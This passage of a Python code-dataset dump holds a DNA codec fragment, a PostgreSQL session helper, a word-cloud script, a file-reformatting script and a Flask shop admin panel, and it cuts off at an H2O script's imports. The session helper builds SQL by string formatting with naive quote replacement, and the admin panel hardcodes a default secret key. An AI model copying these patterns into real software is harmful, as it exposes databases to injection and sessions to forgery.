str(__name__), str(sys._getframe().f_code.co_name),\n \"Data length cannot be odd number!\")\n for index in range(0, len(one_list), 2):\n dna_sequence.append(inherent.index_base.get(self.mapping_rule.index(one_list[index] * 2\n + one_list[index + 1])))\n else:\n for index in range(len(one_list)):\n options = [position for position, value in enumerate(self.mapping_rule) if value == one_list[index]]\n sliding_window = dna_sequence[-3:]\n if len(sliding_window) == 3 and len(set(sliding_window)) == 1:\n bases = list(map(inherent.index_base.get, options))\n for base in bases:\n if base != sliding_window[0]:\n dna_sequence.append(base)\n break\n else:\n dna_sequence.append(inherent.index_base.get(random.choice(options)))\n return dna_sequence\n\n # ================================================= decode part ====================================================\n\n def decode(self, dna_sequences, need_log=False):\n \"\"\"\n introduction: Decode DNA sequences to the data of binary file.\n\n :param dna_sequences: The DNA sequence of len(matrix) rows.\n Type: One-dimensional list(string).\n\n :param need_log: Show the log.\n\n :return matrix: The binary matrix corresponding to the DNA sequences.\n Type: Two-dimensional list(int).\n\n :return file_size: This refers to file size, to reduce redundant bits when transferring DNA to binary files.\n Type: int\n 
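\n        Note: the returned file_size is the value recorded by encode() on this codec instance.\n        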
\"\"\"\n self.m.restore()\n\n if need_log:\n log.output(log.NORMAL, str(__name__), str(sys._getframe().f_code.co_name),\n \"Convert DNA sequences to binary matrix by Simple Codec.\")\n\n matrix = []\n for index in range(len(dna_sequences)):\n if need_log:\n self.m.output(index, len(dna_sequences))\n matrix.append(self._sequence_to_list(dna_sequences[index]))\n\n self.m.restore()\n return matrix, self.file_size\n\n def _sequence_to_list(self, dna_sequence):\n \"\"\"\n introduction: Convert one DNA sequence to one binary list.\n\n :param dna_sequence: One DNA sequence.\n Type: String.\n\n :return one_list: The binary list corresponding to the DNA sequence.\n Type: One-dimensional list(int).\n \"\"\"\n one_list = []\n if max(self.mapping_rule) == 3:\n for index in range(len(dna_sequence)):\n number = self.mapping_rule[inherent.base_index.get(dna_sequence[index])]\n one_list.append(1 if number >= 2 else 0)\n one_list.append(1 if number % 2 == 1 else 0)\n else:\n for index in range(len(dna_sequence)):\n one_list.append(self.mapping_rule[inherent.base_index.get(dna_sequence[index])])\n\n return one_list\n","sub_path":"methods/sc.py","file_name":"sc.py","file_ext":"py","file_size_in_byte":6845,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"34647454","text":"import datetime\n\nimport psycopg2\nimport pandas as pd\n\n\nclass PSQLSession:\n def __init__(self, host, database, user, password):\n self.host = host\n self.database = database\n self.user = user\n self.password = password\n\n def __enter__(self):\n self.connection = psycopg2.connect(host=self.host,\n database=self.database,\n user=self.user,\n password=self.password)\n self.cursor = self.connection.cursor()\n return self\n\n def __exit__(self, exc_type, exc_value, exc_traceback):\n self.cursor.close()\n self.connection.commit()\n self.connection.close()\n\n def query(self, text):\n self.cursor.execute(text)\n data = pd.DataFrame(self.cursor.fetchall(),\n columns=[desc[0]\n for desc in self.cursor.description])\n return data\n\n def check_record_existance(self, table, data):\n query_text = '''SELECT id FROM {} WHERE {};'''.format(table,\n ' AND '.join(self.to_string_dict(data)))\n\n # print(query_text)\n self.cursor.execute(query_text)\n result = self.cursor.fetchall()\n return result[0][0] if len(result) > 0 else None\n\n def insert_query(self, table, columns, data, return_id=False, multiple=False):\n if multiple:\n query_text = '''INSERT INTO {}({}) VALUES {}'''.format(table, ', '.join(columns),\n '(' + '), ('.join([self.to_string_values(v, columns) for v in data]) + ')')\n else:\n query_text = '''INSERT INTO {}({}) VALUES {}'''.format(table, ', '.join(columns),\n '(' + self.to_string_values(data, columns) + ')')\n if return_id:\n query_text += ' RETURNING id'\n\n query_text += ';'\n\n # print(query_text)\n self.cursor.execute(query_text)\n\n if return_id:\n v = [id[0] for id in self.cursor.fetchall()]\n return v if multiple else v[0]\n\n def _get_query_elements(self, data, type='insert'):\n # delete pd.nan values\n deletable = []\n for k in data.keys():\n if pd.isna(data[k]):\n deletable.append(k)\n for k in deletable:\n del(data[k])\n\n keys = data.keys()\n\n values = [str(v) if not isinstance(v, str) and not isinstance(v, datetime.date)\n else '\\'{}\\''.format(v.replace('\\'', '\"'))\n for v in data.values()]\n if type == 'insert':\n return ', '.join(keys), ', '.join(values)\n elif type == 'select':\n return ' AND '.join(['{}={}'.format(key, value) for key, value in zip(keys, 
values)])\n\n    def to_string_values(self, data, columns):\n        output = []\n        for col_name in columns:\n            if col_name in data:\n                # none value\n                if data[col_name] is None or pd.isna(data[col_name]):\n                    v = 'NULL'\n                elif not isinstance(data[col_name], str):  # numeric value\n                    v = str(data[col_name])\n                else:  # string value\n                    v = '\\'{}\\''.format(data[col_name].replace('\\'', '\"'))\n            else:\n                v = 'NULL'\n            output.append(v)\n        return ', '.join(output)\n\n    def to_string_dict(self, data):\n        return ['{}={}'.format(key, str(value)\n                               if not isinstance(value, str)\n                               else '\\'{}\\''.format(value.replace('\\'', '\"')))\n                for key, value in data.items()]\n","sub_path":"src/poe_price/data/session.py","file_name":"session.py","file_ext":"py","file_size_in_byte":3843,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"}
{"seq_id":"214131539","text":"import pandas as pd\nimport numpy as np \nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nfrom subprocess import check_output\nfrom wordcloud import WordCloud, STOPWORDS\n\ndata = pd.read_json('facebookmessage.json')\ndict1 = pd.DataFrame.from_dict(data['messages'])\n\nmessages = dict1[dict1['type']=='Generic']\n\n\nmpl.rcParams['figure.figsize']=(8.0,6.0) #(6.0,4.0)\nmpl.rcParams['font.size']=12 #10 \nmpl.rcParams['savefig.dpi']=100 #72 \nmpl.rcParams['figure.subplot.bottom']=.1 \n\n\nstopwords = set(STOPWORDS)\n\n\nwordcloud = WordCloud(\n    background_color='white',\n    stopwords=stopwords,\n    max_words=200,\n    max_font_size=40, \n    random_state=42\n    ).generate(str(messages['content']))\n\nprint(wordcloud)\nfig = plt.figure(1)\nplt.imshow(wordcloud)\nplt.axis('off')\nplt.show()\ntext = \" \".join(str(review) for review in messages.content)\nprint (\"There are {} words in the combination of all review.\".format(len(text)))\nstopwords = set(STOPWORDS)\nstopwords.update([\"drink\", \"now\", \"wine\", \"flavor\", \"flavors\"])\n\n# Generate a word cloud image\nwordcloud = WordCloud(stopwords=stopwords, background_color=\"white\").generate(text)\n\n# Display the generated image:\n# the matplotlib way:\nplt.imshow(wordcloud, interpolation='bilinear')\nplt.axis(\"off\")\nplt.show()\nmessages = messages[messages['photos']== 'nan']\nmessages = dict1[dict1['type']=='Generic']\nmessages.dropna(thresh=2)\ntest = messages['photos'] == 'nan'\nmessages.info()\ntest = messages.dropna(subset = ['photos','gifs','videos'])\nstopwords = set(STOPWORDS)\nstopwords.update([\"mother\", \"sara\", \"head\", \"flavor\", \"flavors\"])\n\n# Generate a word cloud image\nwordcloud = WordCloud(stopwords=stopwords, background_color=\"white\").generate(text)\n","sub_path":"FacebookMessageWordcloud/FacebookMessageWordcloud.py","file_name":"FacebookMessageWordcloud.py","file_ext":"py","file_size_in_byte":2298,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"}
{"seq_id":"45971848","text":"import sys\n\nif len(sys.argv) != 3:\n    print(\"\\nSyntax error: python3 script_arrumador.py <arquivo_entrada> <arquivo_saida>\\n\")\n    exit()\n\narquivo_entrada = sys.argv[1]\narquivo_saida = sys.argv[2]\n\narquivo = 
open(arquivo_entrada, 'r')\narquivo2 = open(arquivo_saida, 'w')\n\nfor linha in arquivo:\n escrita = ''\n cont = linha.split('\\t')\n escrita = 'i ' + cont[1] + ' ' + cont[9].strip() + ' 80 ' + cont[7]+ ' ' + cont[0] + ' 70 40 5,'+cont[3]+ ','+cont[4]+','+cont[5]+','+cont[6]\n arquivo2.write(escrita+'\\n')\n\n\narquivo2.close()\narquivo.close()\n","sub_path":"Caracterizacao/script_arrumador.py","file_name":"script_arrumador.py","file_ext":"py","file_size_in_byte":549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"294789559","text":"from flask_env import MetaFlaskEnv\nimport mysql.connector\nfrom mysql.connector import pooling\nfrom flask_wtf.csrf import CSRFProtect, CSRFError\nfrom datetime import timedelta\nfrom flask import Flask, render_template, redirect, url_for, make_response, request, flash, session\nimport uuid\nfrom flask_wtf import FlaskForm\nfrom wtforms import StringField, PasswordField\nfrom wtforms.validators import DataRequired\nimport argon2\nimport json\nimport base64\nfrom filedownload import FileDownload\nfrom fileupload import FileUpload\nimport os\nimport ast\nfrom datetime import datetime\nfrom argon2 import PasswordHasher\n\nclass Configuration(metaclass=MetaFlaskEnv):\n SECRET_KEY = \"adminonlineshopsecretkey\"\n WTF_CSRF_SECRET_KEY = \"adminonlineshopsecretkey\"\n WTF_CSRF_TIME_LIMIT = 604800\n COOKIE = \"ADMIN-ONLINE-SHOP-KEY\"\n ADMIN_USER = \"USER\"\n HOST = \"127.0.0.1\"\n DB = \"online-shop\"\n USERS = \"admin\"\n PASSWORD = \"xxxx\"\n PORT = 3306\n ITEMS_TABLE = \"items\"\n ORDERS_TABLE = \"orders\"\n UPLOAD_TABLE = \"upload\"\n PRODUCTS_TABLE = \"products\"\n USERS_TABLE = \"users\"\n MESSAGES_TABLE = \"messages\"\n MINIO_API_URL = \"xxxx:9000\"\n MINIO_ACCESS_KEY = \"xxx\"\n MINIO_SECRET_KEY = \"xxx\"\n MINIO_SECURE = False\n MINIO_BUCKET_NAME = \"byape\"\n UPLOAD_PATH = '/tmp'\n\napp = Flask(__name__)\napp.config['PERMANENT_SESSION_LIFETIME'] = timedelta(hours=1)\ncsrf = CSRFProtect(app)\n\n@app.errorhandler(CSRFError)\ndef handle_csrf_error(e):\n form = LoginForm()\n return render_template('login.html', form=form, message=\"Session expired: {}\".format(e.description))\n\n\nclass LoginForm(FlaskForm):\n username = StringField('username', validators=[DataRequired()])\n password = PasswordField('password', validators=[DataRequired()])\n\ndef from_js_to_python_deserialize(b64data):\n \"\"\"\n b64 encoded byte stream -> b64 decoded byte stream -> json string -> python dictionary.\n The js side use: JSON.stringify() -> btoa()\n :param b64data: Base 64 encoded data\n :return: python dictionary\n \"\"\"\n ret = {}\n try:\n ret = json.loads(base64.b64decode(b64data).decode('utf-8'))\n except:\n pass\n finally:\n return ret\n\ndef from_python_to_js_serialization(pythondict):\n \"\"\"\n pythondict -> json string -> byte array -> b64 encode\n The js side use: string.replace() to remove ' garbage -> JSON.parse() -> atob()\n :param pythondict:\n :return:\n \"\"\"\n return base64.b64encode(json.dumps(pythondict).encode('utf-8'))\n\ndef update_product(id, title, description, price, images):\n conn = cnxpool.get_connection()\n c = conn.cursor()\n mysql_update_query = f\"update {app.config['ITEMS_TABLE']} set title=%s, description=%s, price=%s, images=%s where id=%s\"\n try:\n c.execute(mysql_update_query,(title, description, price, images, id))\n conn.commit()\n ret = 'Inserted', 200\n except Exception as e:\n ret = str(e), 404\n c.close()\n conn.close()\n return ret\n\n\ndef add_product(title, description, price, 
images):\n conn = cnxpool.get_connection()\n c = conn.cursor()\n mysql_add_query = f\"insert into {app.config['ITEMS_TABLE']} (title, description, price, images) values (%s,%s,%s,%s)\"\n try:\n c.execute(mysql_add_query,(title, description, price, images))\n conn.commit()\n ret = 'Inserted', 200\n except Exception as e:\n ret = str(e), 404\n c.close()\n conn.close()\n return ret\n\ndef get_product_by_id(id):\n conn = cnxpool.get_connection()\n c = conn.cursor()\n mysql_select_query = f\"select * from {app.config['ITEMS_TABLE']} where id=%s\"\n c.execute(mysql_select_query, (id,))\n product = c.fetchone()\n if product is not None:\n if product[4] is not None:\n images = ast.literal_eval(product[4])\n resp = {'id': product[0], 'title': product[1], 'description': product[2], 'price': product[3],\n 'images': images}\n else:\n resp = {'id': product[0], 'title': product[1], 'description': product[2], 'price': product[3]}\n else:\n resp = {}\n c.close()\n conn.close()\n return resp\n\ndef get_products():\n response = []\n conn = cnxpool.get_connection()\n c = conn.cursor()\n mysql_select_query = f\"select * from {app.config['ITEMS_TABLE']}\"\n c.execute(mysql_select_query)\n products = c.fetchall()\n if len(products) != 0:\n for product in products:\n if product[4] is not None:\n images = ast.literal_eval(product[4])\n resp = {'id':product[0], 'title': product[1], 'description': product[2], 'price': product[3], 'images': images}\n else:\n resp = {'id': product[0], 'title': product[1], 'description': product[2], 'price': product[3]}\n response.append(resp)\n c.close()\n conn.close()\n return response\n\n\ndef get_name_item(itemid,identified):\n conn = cnxpool.get_connection()\n c = conn.cursor(buffered=True)\n mysql_select_query = f\"select i.title, p.quantity, p.price from {app.config['ITEMS_TABLE']} i join {app.config['PRODUCTS_TABLE']} p on \" \\\n f\"i.id = p.itemid where p.itemid = %s and p.identified = %s\"\n c.execute(mysql_select_query, (itemid, identified))\n item = c.fetchone()\n if item is not None:\n ret = {'item': item[0], 'quantity': item[1], 'price': item[2]}\n else:\n ret = {}\n c.close()\n conn.close()\n return ret\n\ndef get_order_itemid(identified):\n ids = []\n conn = cnxpool.get_connection()\n c = conn.cursor()\n mysql_select_query = f\"select itemid from {app.config['PRODUCTS_TABLE']} where identified = %s\"\n c.execute(mysql_select_query, (identified,))\n itemids = c.fetchall()\n if len(itemids) != 0:\n for id in itemids:\n ids.append(id[0])\n c.close()\n conn.close()\n return ids\n\ndef get_order_by_identified():\n conn = cnxpool.get_connection()\n c = conn.cursor()\n mysql_select_query = f\"select identified from {app.config['ORDERS_TABLE']} order by time desc\"\n c.execute(mysql_select_query)\n orders = c.fetchall()\n if len(orders) != 0:\n ret = orders\n else:\n ret = []\n c.close()\n conn.close()\n return ret\n\ndef get_items(date):\n results = []\n conn = cnxpool.get_connection()\n c = conn.cursor()\n mysql_select_query = f\"select identified, name, email, phone, address, city, payment, total, time, dayship, timeship, ordercode, note, checked from \" \\\n f\"{app.config['ORDERS_TABLE']} where identified = %s and date(time) = %s\"\n orders = get_order_by_identified()\n for order in orders:\n quantity = []\n ids = get_order_itemid(order[0])\n for id in ids:\n quantity.append(get_name_item(id,order[0]))\n c.execute(mysql_select_query, (order[0], date))\n resp = c.fetchone()\n if resp is not None:\n day_raw = resp[9].split('-')\n day = day_raw[2] + '/' + day_raw[1] + '/' + 
day_raw[0]\n            results.append({'identified': resp[0], 'name': resp[1], 'email': resp[2], 'phone': resp[3], 'address': resp[4],\n                            'city': resp[5], 'payment': resp[6], 'total':resp[7], 'timeorder':resp[8].strftime('%H:%M %d/%m/%Y'),\n                            'dayship': day, 'timeship': resp[10], 'code': resp[11], 'note': resp[12], 'checked': resp[13],'detail': quantity})\n    c.close()\n    conn.close()\n    return results\n\ndef delete_item(id):\n    conn = cnxpool.get_connection()\n    c = conn.cursor()\n    mysql_delete_query = f\"delete from {app.config['ITEMS_TABLE']} where id=%s\"\n    try:\n        c.execute(mysql_delete_query, (id,))\n        conn.commit()\n        ret = 'Item deleted', 200\n    except Exception as e:\n        ret = str(e), 404\n    c.close()\n    conn.close()\n    return ret\n\ndef delete_msg(id):\n    conn = cnxpool.get_connection()\n    c = conn.cursor()\n    mysql_delete_query = f\"delete from {app.config['MESSAGES_TABLE']} where id=%s\"\n    try:\n        c.execute(mysql_delete_query, (id,))\n        conn.commit()\n        ret = 'Item deleted', 200\n    except Exception as e:\n        ret = str(e), 404\n    c.close()\n    conn.close()\n    return ret\n\n\ndef displayfunction(viewstate):\n    orders = []\n    current = datetime.now().strftime('%H:%M:%S %d/%m/%Y')\n    user = session.get('user')\n    email = session.get('email')\n    telephone = session.get('telephone')\n    if len(viewstate) == 0:\n        try:\n            current_date = datetime.now().strftime('%Y-%m-%d')\n            orders = get_items(current_date)\n        except Exception as e:\n            flash('Error: {}'.format(str(e)))\n            pass\n    viewstate = from_python_to_js_serialization(viewstate)\n    numbResults = len(orders)\n    return render_template('index.html', user=user, viewstate=viewstate, results=numbResults, datas=orders, current=current, email=email, telephone=telephone)\n\n\ndef login_function(form):\n    user_name = form.username.data\n    user_pass = form.password.data\n    ph = argon2.PasswordHasher()\n    conn = cnxpool.get_connection()\n    c = conn.cursor()\n    mysql_select_query = f\"select password, username, email, telephone from {Configuration.USERS_TABLE} where username = %s LIMIT 1\"\n    c.execute(mysql_select_query, (user_name,))\n    record = c.fetchone()\n    if record is not None:\n        try:\n            if ph.verify(record[0], user_pass) is True:\n                ret = {'user': record[1], 'email':record[2], 'telephone':record[3], 'message':'authsuccess'}\n                code = 200\n                session[\"if_logged\"] = True\n                session['user'] = record[1]\n                session['email'] = record[2]\n                session['telephone'] = record[3]\n        except (argon2.exceptions.VerifyMismatchError, argon2.exceptions.VerificationError):\n            ret = {'message': 'Login incorrect'}\n            code = 401\n    else:\n        ret = {'message': 'Login incorrect'}\n        code = 401\n    c.close()\n    conn.close()\n    return ret, code\n\ndef search_function(keyword):\n    result = []\n    conn = cnxpool.get_connection()\n    c = conn.cursor()\n    # bind the search patterns as query parameters instead of formatting user input\n    # into the SQL string (prevents SQL injection via keyword)\n    mysql_select_query = f\"select identified, name, email, phone, address, city, payment, total, time, dayship, timeship, ordercode, note from {app.config['ORDERS_TABLE']}\" \\\n                         f\" where email like %s or phone like %s or ordercode like %s\"\n    c.execute(mysql_select_query, ('%' + keyword + '%', keyword + '%', keyword + '%'))\n    records = c.fetchall()\n    if len(records) != 0:\n        for resp in records:\n            quantity = []  # reset per order so each result lists only its own items\n            ids = get_order_itemid(resp[0])\n            for id in ids:\n                quantity.append(get_name_item(id, resp[0]))\n            day_raw = resp[9].split('-')\n            day = day_raw[2] + '/' + day_raw[1] + '/' + day_raw[0]\n            result.append({'identified': resp[0], 'name': resp[1], 'email': resp[2], 'phone': resp[3], 'address': resp[4],\n                           'city': resp[5], 'payment': resp[6], 'total': resp[7], 'timeorder': resp[8].strftime('%H:%M %d/%m/%Y'),\n                           'dayship': day, 
'timeship': resp[10], 'code': resp[11], 'note': resp[12], 'detail': quantity})\n ret = {'keyword': keyword, 'results': result}\n code = 200\n else:\n ret = {'message': 'Search does not exist'}\n code = 404\n c.close()\n conn.close()\n return ret, code\n\ndef check_done_function(id):\n conn = cnxpool.get_connection()\n c = conn.cursor()\n check = 1\n mysql_update_query = f\"update {app.config['ORDERS_TABLE']} set checked=%s where identified=%s\"\n try:\n c.execute(mysql_update_query, (check,id))\n conn.commit()\n ret = 'Updated', 200\n except Exception as e:\n ret = str(e), 404\n c.close()\n conn.close()\n return ret\n\ndef check_undone_function(id):\n conn = cnxpool.get_connection()\n c = conn.cursor()\n check = 0\n mysql_update_query = f\"update {app.config['ORDERS_TABLE']} set checked=%s where identified=%s\"\n try:\n c.execute(mysql_update_query, (check,id))\n conn.commit()\n ret = 'Updated', 200\n except Exception as e:\n ret = str(e), 404\n c.close()\n conn.close()\n return ret\n\ndef profilechange(email,telephone,user):\n conn = cnxpool.get_connection()\n c = conn.cursor()\n mysql_update_query = f\"update {app.config['USERS_TABLE']} set email=%s,telephone=%s where username=%s\"\n try:\n c.execute(mysql_update_query, (email,telephone,user))\n conn.commit()\n ret = 'Updated', 200\n except Exception as e:\n ret = str(e), 404\n c.close()\n conn.close()\n return ret\n\ndef passchange(user, curpass, newpass):\n current_user = user\n current_pass = curpass\n newpass = newpass\n conn = cnxpool.get_connection()\n c = conn.cursor()\n ph = PasswordHasher()\n mysql_select_query = f\"select username, password, enable from {Configuration.USERS_TABLE} where username = %s LIMIT 1\"\n c.execute(mysql_select_query, (current_user,))\n record = c.fetchone()\n try:\n if ph.verify(record[1], current_pass) is True:\n mysql_update_query = f\"update {Configuration.USERS_TABLE} set password = %s where username = %s\"\n mysql_update_tuple = (ph.hash(newpass), current_user)\n c.execute(mysql_update_query, mysql_update_tuple)\n conn.commit()\n ret = {'username': current_user}\n code = 200\n except (argon2.exceptions.VerifyMismatchError, argon2.exceptions.VerificationError) as e:\n ret = {'message': f\"Password change failed because {str(e)}\"}\n code = 404\n c.close()\n conn.close()\n return ret, code\n\ndef get_messages_by_date(date):\n results = []\n conn = cnxpool.get_connection()\n c = conn.cursor()\n mysql_select_query = f\"select * from {app.config['MESSAGES_TABLE']} where date(time)=%s\"\n c.execute(mysql_select_query, (date,))\n records = c.fetchall()\n if records is not None:\n for record in records:\n res = {'id': record[0], 'name': record[1], 'phone': record[2], 'subject': record[3], 'message': record[4], 'time': record[5].strftime('%H:%M %d/%m/%Y')}\n results.append(res)\n ret = results\n code = 200\n else:\n ret = results\n code = 404\n c.close()\n conn.close()\n return ret, code\n\n@app.route('/')\ndef root():\n resp = redirect(url_for('login'))\n return resp\n\n@app.route('/menu', methods=['GET', 'POST'])\ndef menu():\n if session.get('if_logged') is not None:\n return displayfunction(viewstate={})\n else:\n flash('You need to login first')\n return redirect('/login', code=302)\n\n@app.route('/login', methods=['GET', 'POST'])\ndef login():\n session.permanent = True\n form = LoginForm()\n if form.validate_on_submit():\n # Make openapi login query with username and password\n try:\n login_systems = login_function(form)\n if login_systems[1] == 200:\n # If response is code 200 --> get apikey and set 
cookie\n resp = make_response(redirect(\"/menu\"))\n else: \n # If response is code 401 --> redirect to error login page\n flash(f\"{login_systems[0]['message']}\")\n resp = render_template('login.html', form=form)\n return resp\n except Exception as e:\n session.clear()\n flash(f\"{str(e)}\")\n return render_template('login.html', form=form)\n return render_template('login.html', form=form)\n\n@app.route('/logout')\ndef logout():\n resp = make_response(render_template('login.html', form=LoginForm(), message=\"Session Expired\"))\n session.clear()\n return resp\n\n@app.route('/check', methods=['POST'])\ndef check():\n id = request.form.get('id')\n try:\n check_done_function(id)\n except Exception as e:\n session.clear()\n flash(str(e))\n return redirect('/menu')\n\n@app.route('/uncheck', methods=['POST'])\ndef uncheck():\n id = request.form.get('id')\n try:\n check_undone_function(id)\n except Exception as e:\n session.clear()\n flash(str(e))\n return redirect('/menu')\n\n@app.route('/changeprofile', methods=['POST'])\ndef changemailform():\n email = request.form.get('newmail')\n phone = request.form.get('newphone')\n user = session['user']\n try:\n change = profilechange(email,phone,user)\n if change[1] == 200:\n flash('Profile successful changed')\n else:\n flash('Failed to change')\n except Exception as e:\n session.clear()\n flash(str(e))\n return redirect('/menu')\n\n\n@app.route('/changepassword', methods=['POST'])\ndef changepassword():\n curpass = request.form.get('curpass')\n newpass = request.form.get('newpass')\n user = session['user']\n try:\n passchange(user,curpass,newpass)\n flash('Password successful changed')\n except Exception as e:\n session.clear()\n flash(str(e))\n return redirect('/menu')\n\n@app.route('/message', methods=['GET', 'POST'])\ndef message():\n if session.get('if_logged') is not None:\n user = session.get('user')\n messages = []\n if request.method == 'POST':\n datepicker = request.form.get('date').split('T')\n date = datepicker[0]\n try:\n msg = get_messages_by_date(date)\n if msg[1] == 200:\n flash(f\"Found total {len(msg[0])} message\")\n messages.extend(msg[0])\n else:\n flash(\"No message found\")\n except Exception as e:\n session.clear()\n flash('Error: {}'.format(str(e)))\n pass\n else:\n try:\n current_date = datetime.now().strftime('%Y-%m-%d')\n msg = get_messages_by_date(current_date)\n if msg[1] == 200 and len(msg[0]) > 0:\n flash(f\"Found total {len(msg[0])} message\")\n messages.extend(msg[0])\n else:\n flash(\"No message found\")\n except Exception as e:\n session.clear()\n flash('Error: {}'.format(str(e)))\n pass\n return render_template('message.html', user=user, datas=messages)\n else:\n flash('You need to login')\n return redirect('/login', code=302)\n\n\n@app.route('/orderlist', methods=['GET', 'POST'])\ndef orderlist():\n if session.get('if_logged') is not None:\n orders = []\n sales = 0\n user = session.get('user')\n if request.method == 'POST':\n datepicker = request.form.get('date').split('T')\n date = datepicker[0]\n try:\n orders = get_items(date)\n for order in orders:\n sales += int(order['total'])\n except Exception as e:\n session.clear()\n flash('Error: {}'.format(str(e)))\n pass\n else:\n try:\n current_date = datetime.now().strftime('%Y-%m-%d')\n orders = get_items(current_date)\n for order in orders:\n sales += int(order['total'])\n except Exception as e:\n session.clear()\n flash('Error: {}'.format(str(e)))\n pass\n if len(orders) == 0:\n flash('No order found')\n return render_template('orderlist.html', user=user, 
datas=orders, sales=sales)\n else:\n flash('You need to login')\n return redirect('/login', code=302)\n\n@app.route('/admin_products', methods=['GET', 'POST'])\ndef admin_products():\n if session.get('if_logged') is not None:\n products = []\n user = session.get('user')\n items = get_products()\n for product in items:\n images = []\n if 'images' in product:\n if 'profile' in product['images']:\n profileimg = product['images']['profile']['path']\n bucket_name = product['images']['profile']['bucket_name']\n try:\n file = download.download_file(profileimg, bucket_name=bucket_name)\n product['img'] = base64.b64encode(file['data']).decode('ascii')\n product['content_type'] = file['content_type']\n product['profilehasimg'] = True\n except:\n product['profilehasimg'] = False\n else:\n product['profilehasimg'] = False\n if 'images' in product['images']:\n if len(product['images']['images']) != 0:\n for p in product['images']['images']:\n try:\n file = download.download_file(p['path'], p['bucket_name'])\n img = base64.b64encode(file['data']).decode('ascii')\n content_type = file['content_type']\n images.append({'img': img, 'content_type': content_type, 'hasimg': True})\n except:\n product['hasimg'] = False\n product['imgs'] = images\n product['hasimg'] = True\n else:\n product['hasimg'] = False\n product.pop('images')\n else:\n product['profilehasimg'] = False\n product['hasimg'] = False\n products.append(product)\n return render_template('admin-products.html', products=products, user=user)\n else:\n flash('You need to login')\n return redirect('/login', code=302)\n\n@app.route('/search', methods=['POST'])\ndef search():\n if request.method == 'POST':\n user = session.get('user')\n keyword = request.form.get('keyword')\n search_resp = search_function(keyword)\n if search_resp[1] == 200:\n flash(f\"Found {len(search_resp[0]['results'])} result with {search_resp[0]['keyword']}\")\n return render_template('search.html', user=user, datas=search_resp[0]['results'], keyword=search_resp[0]['keyword'], numb=len(search_resp[0]['results']))\n else:\n flash('No result found')\n return render_template('search.html', user=user, datas=[], keyword=keyword, numb=0)\n return redirect('/orderlist', code=302)\n\n@app.route('/delete', methods=['POST'])\ndef delete():\n if session.get('if_logged') is not None:\n id = request.form.get('itemid')\n delete = delete_item(id)\n flash(f\"{delete[0]}\")\n return redirect(\"/admin_products\")\n else:\n flash('You need to login')\n return redirect('/login', code=302)\n\n\n@app.route('/delete_message', methods=['POST'])\ndef delete_message():\n if session.get('if_logged') is not None:\n id = request.form.get('itemid')\n delete = delete_msg(id)\n flash(f\"{delete[0]}\")\n return redirect(\"/message\")\n else:\n flash('You need to login')\n return redirect('/login', code=302)\n\n@app.route('/edititem', methods=['POST'])\ndef edititem():\n if session.get('if_logged') is not None:\n profile = {}\n images = []\n product = get_product_by_id(request.form.get('itemid'))\n name = product['title']\n description = product['description']\n price = product['price']\n if 'images' in product:\n profile_db = product['images']\n if request.method == 'POST':\n if 'editname' in request.form:\n name = request.form.get('editname')\n if 'editdescription' in request.form:\n description = request.form.get('editdescription')\n if 'editprice' in request.form:\n price = request.form.get('editprice')\n if 'pfimg' in request.files:\n try:\n profileimg = request.files.get('pfimg')\n filepath = 
os.path.join(app.config['UPLOAD_PATH'], profileimg.filename)\n profileimg.save(filepath)\n resp = upload.upload_file(filepath, profileimg.content_type)\n profile['profile'] = resp\n os.remove(filepath)\n except:\n profile['profile'] = profile_db['profile']\n if 'imgs' in request.files:\n files = request.files.getlist('imgs')\n try:\n for file in files:\n filepath = os.path.join(app.config['UPLOAD_PATH'], file.filename)\n file.save(filepath)\n resp = upload.upload_file(filepath, file.content_type)\n images.append(resp)\n os.remove(filepath)\n profile['images'] = images\n except:\n profile['images'] = profile_db['images']\n update = update_product(request.form.get('itemid'),name,description,int(price), str(profile))\n if update[1] == 200:\n flash('Updated successful')\n else:\n flash('Update item failed')\n return redirect(\"admin_products\")\n else:\n flash('You need to login')\n return redirect('/login', code=302)\n\n@app.route('/additem', methods=['POST'])\ndef additem():\n if session.get('if_logged') is not None:\n profile = {}\n images = []\n if request.method == 'POST':\n name = request.form.get('name')\n description = request.form.get('description')\n price = request.form.get('price')\n profileimg = request.files.get('profileimg')\n filepath = os.path.join(app.config['UPLOAD_PATH'], profileimg.filename)\n profileimg.save(filepath)\n resp = upload.upload_file(filepath, profileimg.content_type)\n profile['profile'] = resp\n os.remove(filepath)\n files = request.files.getlist('files')\n for file in files:\n filepath = os.path.join(app.config['UPLOAD_PATH'], file.filename)\n file.save(filepath)\n resp = upload.upload_file(filepath, file.content_type)\n images.append(resp)\n os.remove(filepath)\n profile['images'] = images\n add = add_product(name,description,int(price),str(profile))\n if add[1] == 200:\n flash('Added successful')\n else:\n flash('Add item failed')\n return redirect(\"admin_products\")\n else:\n flash('You need to login')\n return redirect('/login', code=302)\ntry:\n app.config.from_pyfile('settings.cfg')\nexcept FileNotFoundError:\n app.config.from_object(Configuration)\n\nupload = FileUpload(**{'api_minio_url': app.config['MINIO_API_URL'],\n 'access_key': app.config['MINIO_ACCESS_KEY'],\n 'secret_key': app.config['MINIO_SECRET_KEY'],\n 'minio_secure': app.config['MINIO_SECURE'],\n 'bucket_name':app.config['MINIO_BUCKET_NAME']})\n\ndownload = FileDownload(**{'api_minio_url': app.config['MINIO_API_URL'],\n 'access_key': app.config['MINIO_ACCESS_KEY'],\n 'secret_key': app.config['MINIO_SECRET_KEY'],\n 'minio_secure': app.config['MINIO_SECURE']})\n\ncnxpool = mysql.connector.pooling.MySQLConnectionPool(pool_name=\"admin-online\",\n host=app.config['HOST'],\n database=app.config['DB'],\n user=app.config['USERS'],\n password=app.config['PASSWORD'],\n port=app.config['PORT'],\n pool_size=20)\nif __name__ == '__main__':\n app.run()","sub_path":"admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":28064,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"580255899","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*\n\"\"\"\nCreated on Tue May 26 01:07:34 2020\n\n@author: sruthi\n\"\"\"\n\nimport pandas as pd\nimport h2o\nimport time\nfrom h2o.estimators.gbm import H2OGradientBoostingEstimator\nfrom sklearn.metrics import 